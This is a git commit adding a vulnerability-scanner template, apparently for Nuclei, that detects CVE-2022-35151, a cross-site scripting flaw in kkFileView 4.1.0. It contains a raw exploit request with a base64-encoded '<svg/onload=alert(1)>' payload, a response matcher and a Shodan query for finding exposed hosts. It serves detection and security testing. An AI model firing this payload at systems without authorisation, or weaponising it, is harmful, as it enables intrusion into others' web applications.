Create CVE-2022-35151.yaml
parent
b867ed6ef5
commit
d591728dcd
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2022-35151
|
||||
|
||||
info:
|
||||
name: kkFileView v4.1.0 - Cross Site Scripting
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
kkFileView v4.1.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35151
|
||||
- https://github.com/kekingcn/kkFileView/issues/366
|
||||
metadata:
|
||||
shodan-query: http.html:"kkFileView"
|
||||
verified: "true"
|
||||
tags: xss,cve,2022
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '<svg/onload=alert(1)>'
|
Loading…
Reference in New Issue